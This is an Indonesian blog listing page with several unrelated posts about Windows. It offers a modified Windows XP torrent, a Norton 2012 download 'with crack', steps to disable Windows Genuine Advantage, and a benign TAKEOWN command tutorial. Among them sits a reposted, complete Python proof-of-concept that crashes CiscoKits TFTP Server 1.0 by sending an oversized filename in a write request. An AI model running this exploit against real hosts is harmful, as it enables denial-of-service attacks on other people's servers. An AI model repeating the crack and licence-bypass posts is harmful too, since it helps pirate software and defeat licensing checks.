Tampilkan postingan dengan label Windows. Tampilkan semua postingan

Windows Xp Pro SP3 Genuine Untuk HP/Compaq

by in , , , , , , 1

Jika sebelumnya sudah saya bahas tentang Cara Menambahkan Driver SATA AHCI untuk HP CompaQ yang mana tutorial tersebut tidak susah untuk anda pahami dan kerjakan, namun apabila ingin yang sudah jadi silahkan anda download Windows Xp Pro SP3 Genuine Untuk HP/Compaq dengan ISO 781.81 MB diakhir artikel ini yang berbentuk file torrent, Adapun beberapa aplikasi/program tambahannya meliputi:
 

1. Audacity 1.2.6
2. Avast Antivirus Home Edition Ver. 4.8.1227
3. CCLeaner 2.13.720
4. Convert X To Dvd 3.1.3.40 (For Turning XVID Files Into DVD’s)
5. Dvd Fab Decrypter 4.1.2.0 (For Copying Protected DVD’s)
6. Firefox 3.0.3
7. HashTab 2.1.1
8. Internet Explorer 7
9. K-Lite Codec Mega Pack With Media PLayer Classic
10.nLite 1.4.9.1 (For Making Your Own Custom Windows Install Discs)
11.net Framework 1.0 , 2.0 , 3.0 , and 3.5
12.ObjectDock 1.9
13.Opera 9.61
14.Peerguardian 2.0 (For Blocking Ip Addresses That Track Illegal Downloaders)
15.PowerIso (For Burning Discs That You Downloaded From The Bay)
16.Resource Hacker 3.4.0 (Allows You To Edit System Files Easily)
17.Ultimate Themes Pack (default is set to xp theme)
18.UTorrent 1.8.1
19.Vista Sounds Package (default is set to xp sounds)
20.Winamp 5.541
21.Windows Media Player 11
22.WinRAR 3.80


Download
PERHATIAN!
Untuk cara downloadnya Anda akan diarahkan ke adf.ly kemudian tunggu 5 detik dan cari tombol SKIP AD yang berada di sebelah kanan atas monitor anda.

CiscoKits 1.0 TFTP Server DoS (write command)

by in , 0

#!/usr/bin/python
##############################################################################
# Title : CiscoKits CCNA TFTP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=271
# http://secpod.org/SECPOD_CiscoKits_CCNA_TFTP_DoS_POC.py
# http://secpod.org/advisories/SECPOD_Ciscokits_CCNA_TFTP_DoS.txt
# Version : CiscoKits CCNA TFTP Server 1.0.0.0
# Date : 21/07/2011
##############################################################################

import socket,sys,time

port = 69
target = raw_input("Enter host/target ip address: ")

if not target:
print "Host/Target IP Address is not specified"
sys.exit(1)

print "you entered ", target

try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

#File name >= 222 length leads to crash
exploit = "A" * 500

mode = "netascii"
print "File name WRITE crash"
# WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"
sock.sendto(data, (target, port))
time.sleep(5)


(C) inj3ct0R TEAM - http://1337day.com/exploits/16612

FREE Download Norton Internet Security 2012 Final Full Version With Crack

by in , , , 0

Selamat datang pada Norton Internet Security 2012 versi terbaru yang biasa disingkat dengan nama NIS 2012, Sekarang Anda dapat menggunakan Norton Internet Security 2012 Beta v19.0.0.128 yang baru dirilis sekitar dua bulan yang lalu. Dan tak lupa bahwa NIS 2012 ini akan disertakan dengan crack dengan masa aktif 1 tahun (340 day remaining) + serial number Norton Internet Security 2012 percobaan selama 3 bulan. Norton Internet Security 2012 full version ini dapat anda dapatkan dan gunakan secara gratis, Berikut ini screenshot NIS 2012 yang telah diuji coba kebenaran crack maupun SN Norton Internet Security 2012.




Free Download Norton Internet Security 2012 Trial l 119.56 MB

Free Download 1 Year License Key Norton Internet Security 2011 (CRACK)

Gratis Download SN Norton Internet Security 2012

by in , , 0

kali ini ane akan berikan temen2 software alternatif Adobe Photosop yakni GIMP. GIMP itu sendiri berlisensi GNU/Linux. Jadi sobat gratis mengunduh, memodif dan menggunakannya

Baca selengkapnya »

[DOS] Merubah permission suatu file atau folder pada Windows

by in , 0

Perintah :
TAKEOWN [/S system [/U username [/P [pass
/F filename [/A] [/R [/D prompt]] 


/s system Specifies the remote system to connect to.
/u [domain\]user Specifies the user context under which the command should execute.
/p [password] Specifies the password for the given user context. Prompts for input if omitted.
/f filename Specifies the filename or directory name pattern. Wildcard "*" can be used to specify the pattern. Allows sharename\filename.
/a   Gives ownership to the administrators group instead of the current user.
/r   Recurse: instructs tool to operate on files in specified directory and all subdirectories.
/d prompt Default answer used when the current user does not have the "list folder" permission on a directory. This occurs while operating recursively (/R) on sub-directories. Valid values "Y" to take ownership or "N" to skip.
/?   Displays help.


Contoh:
TAKEOWN /?
TAKEOWN /F lostfile
TAKEOWN /F \\system\share\lostfile /A
TAKEOWN /F directory /R /D N
TAKEOWN /F directory /R /A
TAKEOWN /F *
TAKEOWN /F C:\Windows\System32\acme.exe
TAKEOWN /F %windir%\*.txt
TAKEOWN /S system /F MyShare\Acme*.doc
TAKEOWN /S system /U user /F MyShare\foo.dll
TAKEOWN /S system /U domain\user /P password /F share\filename
TAKEOWN /S system /U user /P password /F Doc\Report.doc /A
TAKEOWN /S system /U user /P password /F Myshare\*
TAKEOWN /S system /U user /P password /F Home\Logon /R
TAKEOWN /S system /U user /P password /F Myshare\directory /R /A

Bagaimana cara menjalankannya, ya sudah pasti lewat Command Prompt ataupun melalui file BAT. Mari kita praktekan, jalankan program NOTEPAD di komputernya misal folder yang akan diubah permissionnya adalah D:\DATA, kita ketik didalam notepad terebut
@echo off
takeown /F D:\DATA
pause
Kemudian simpan, perlu digaris bawahi tipe dari file Save As Type All Files (*.*) dan akhir dari nama file berextensi BAT. misal TAKEOWN.BAT. Setelah file disimpan, jalankan file TAKEOWN.BAT dengan cara mengklik kanan file tersebut dan pilih Run As Adminisrator.
Selamat Mencoba!!!

TCP View Virus/Remote Exploit.

by in , , 0


TCP View adalah program Windows yang bisa menampilkan semua informasi TCP dan UDP pada sistem sobat, termasuk alamat localhost dan remote TCP.

Baca selengkapnya »

Menghapus Pesan Windows Genuine Advantage

by in , 0

* Rename %Windir%\system32\WgaLogon.dll to %Windir%\system32\WgaLogon.old
* Rename %Windir%\system32\WgaTray.exe to %Windir%\system32\WgaTray.old
* Restart Komputer.

Baca selengkapnya »